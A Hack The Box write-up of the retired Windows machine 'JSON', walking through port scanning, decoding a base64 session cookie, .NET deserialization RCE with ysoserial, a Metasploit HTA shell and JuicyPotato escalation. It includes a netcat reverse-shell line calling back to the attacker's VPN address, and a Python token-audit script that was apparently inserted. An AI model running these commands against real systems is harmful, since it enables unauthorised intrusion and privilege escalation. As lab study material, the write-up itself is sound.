Hackthebox - Retired - JSON

As always I start with a simple up/down scan on all TCP ports for a staged scan

nmap -T4 -p- -oX ./nmapb.xml 10.10.10.158

Then I convert the output to HTML

# xsltproc ./nmapb.xml -o ./nmapb.html

That's a lot of open ports

Let's scan just those ports with the -A switch to fingerprint the OS and services

# nmap -T4 -p21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,4915 -A -oX ./nmapf.xml 10.10.10.158

Then convert that to HTML

# xsltproc ./nmapf.xml -o ./nmapf.html

Looks like we got a Windows box with FileZilla FTP on 21, IIS on 80 and NetBIOS/SMB, with RPC on 5985

Let's start poking around.

SMB is open but no shares for anonymous

Same story for FTP

At least 80 is open, there is a page displayed briefly then it redirects to this login page

Same old song for rpc

Dirb found

root@kali:~/Desktop/HTB/json# dirb http://10.10.10.158

-----------------

DIRB v2.22

By The Dark Raver

-----------------

START_TIME: Thu Jan 30 21:54:09 2020

WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

Dirbuster found this password.txt file

It also found

/api/token

/api/account

Exploit

So guess what the login creds for the website are??

admin/admin

But more importantly we caught this in burp

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=;

Let's unpack that base64

# echo "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" | base64 -d

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

Username: admin

Password: 21232f297a57a5a743894a0e4a801fc3

Cool, so after we auth correctly we get a cookie back that saves our auth session for us.

I tried in the browser going to json.htb/api/account that we found earlier and caught this in burp

If i repeat this same request in burpsuite's repeater we get some json looking data back

So we have a new header present, named Bearer, carrying the same base64-encoded blob as our cookie. This looks like a call into the API that we can hopefully leverage.

So now we move on to see if this is vulnerable to a deserialization attack.

Here is a write-up about deserialization

The idea with JSON is that you can send and receive data in a specified format. What we are hoping here is that the web app deserializes this data without sanitizing or checking it first, which we can use to get RCE on the box.
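As an added defender-side example (not part of the original write-up), this script audits tokens of the shape seen above: it reports whether a cookie/Bearer value is bare base64-encoded JSON with no signature, whether it carries credential or role claims the client could simply edit, and whether it contains a Json.NET `$type` discriminator, the marker the deserializer acts on when TypeNameHandling is not None. The sample values are constructed here; the type name in the second sample is a placeholder.

```python
import base64
import json
from typing import Any, Iterator

# Constructed sample with the same shape as the session cookie decoded above.
SAMPLE_COOKIE = base64.b64encode(json.dumps({
    "Id": 1, "UserName": "admin",
    "Password": "21232f297a57a5a743894a0e4a801fc3",
    "Name": "User Admin HTB", "Rol": "Administrator",
}).encode()).decode()

# Constructed sample carrying a Json.NET "$type" discriminator (placeholder type name).
SAMPLE_TYPED = base64.b64encode(
    b'{"$type":"Placeholder.Type, PlaceholderAssembly","Id":1}').decode()

TYPE_KEYS = {"$type"}
SENSITIVE_KEYS = {"password", "pwd", "hash", "rol", "role", "isadmin"}


def decode_token(value: str) -> Any:
    """Drop the trailing ';' Burp showed, fix base64 padding, parse the JSON."""
    raw = value.strip().rstrip(";")
    raw += "=" * (-len(raw) % 4)
    return json.loads(base64.b64decode(raw, validate=True))


def token_kind(value: str) -> str:
    """Classify a token: JWT-like (has a signature segment), bare JSON, or opaque."""
    v = value.strip().rstrip(";")
    if v.count(".") == 2:
        return "jwt-like (signature segment present)"
    try:
        decode_token(v)
        return "bare base64 JSON (no signature, client can forge it)"
    except ValueError:  # binascii.Error, UnicodeDecodeError, JSONDecodeError
        return "opaque"


def walk_keys(obj: Any) -> Iterator[str]:
    """Yield every key in a nested JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield k
            yield from walk_keys(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from walk_keys(v)


def audit_token(value: str) -> dict:
    """Findings a reviewer would raise about a token of this shape."""
    keys = list(walk_keys(decode_token(value)))
    return {
        "kind": token_kind(value),
        "carries_credential_or_role": sorted(k for k in keys if k.lower() in SENSITIVE_KEYS),
        "has_type_discriminator": any(k in TYPE_KEYS for k in keys),
    }
```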

There were some talks at blackhat a while back focusing on this attack vector

I found a tool that will format our commands and base64 encode them so we can send a get request to the webapp and hope that it runs our code for us.

This is a Windows exe so I had to fire up a Windows VM and build the app from the source using Visual Studio.

Now that we have the exe let's see what we can do with it

I just want to start with a POC to see if I can get the box to ping my VPN IP

There are 11 different Gadgets we can utilize in the tool to generate our payload

The first thing I did was write out a little batch script to make each of the payloads for me and load them up in burp to see if we get anything back

ysoserial.exe -f BinaryFormatter -g ObjectDataProvider -c "ping 10.10.14.25" -o base64

My batch script generated everything with BinaryFormatter since all the gadgets could use this format. I also base64 encoded it so I could just copy and paste into Burp.

Let's set our machine to listen to incoming pings

tcpdump -i tun0 -n icmp

This command basically says listen on my tun0 interface and only let me know about ICMP packets.

So in my repeater, I just copied the outputs from ysoserial into the Bearer header, hit send and waited to see if I got any pings

Here is what the first payload looked like

I tried all 10 ( one of them required an input file )

No love

Looking through the other available formatters that the gadgets can use, one stood out pretty quickly ( don't know why I didn't see it before )

Json.Net: we are working with JSON, so let's try that one

Only 3 of the gadgets could use this formatter

ObjectDataProvider

WindowsClaimsIdentity

WindowsIdentity

So I generated a new json payload for all three of these gadgets and tried them

The last one is WindowsIdentity….

Well we finally got some love

Yay!!!

Ok looks like we can use this deserialization attack to hopefully get somewhere on this box.

Alright let's use mshta to get us a shell

First we need to setup our msfconsole

msfconsole

use exploit/windows/misc/hta_server

Let's check our options

Let's set srvhost to our VPN IP

set srvhost 10.10.14.25

I have a feeling this is x64 so let's see what options we have for target.

We want to change this to x64

set target 1

And lets run

Ok, there is an LHOST we need to set too; one of these days I'll learn how to check this before I execute.

set lhost 10.10.14.25

Run

Oi our port is still open somewhere else, let's change that too

set lport 4445

Will it run now?

Happy dance!!!

We got a shell

sessions 1

Let's get that user.txt file

Let's escalate

My plan is to use juicy potato and netcat to get a privileged shell back

First let's serve up potato.exe and nc.exe to the Json.HTB box

# python -m SimpleHTTPServer 8888

This is run from my payloads directory, which contains both juicypotato.exe and nc.exe

Then we use certutil to download the files to the tmp directory on json.htb

Now on json.htb I'll make a new bat file that will call back a reverse shell to my attacking computer using nc.exe

C:\tmp>echo C:\tmp\nc.exe -e cmd.exe 10.10.14.25 4445 > revshell.bat

Let's setup our nc listener on our attacking machine to grab this connection when we execute on json.htb

Now let's launch potato and have it use the new revshell.bat to escalate

C:\tmp>potato.exe -p C:\tmp\revshell.bat -l 4445 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Looks like it worked. Let's check out our nc listener to see if we have the connection

And what user are we now? It should be SYSTEM according to the potato output

Let's get that root hash now

C:\Users\superadmin\Desktop>type root.txt

type root.txt

3cc8*****************************
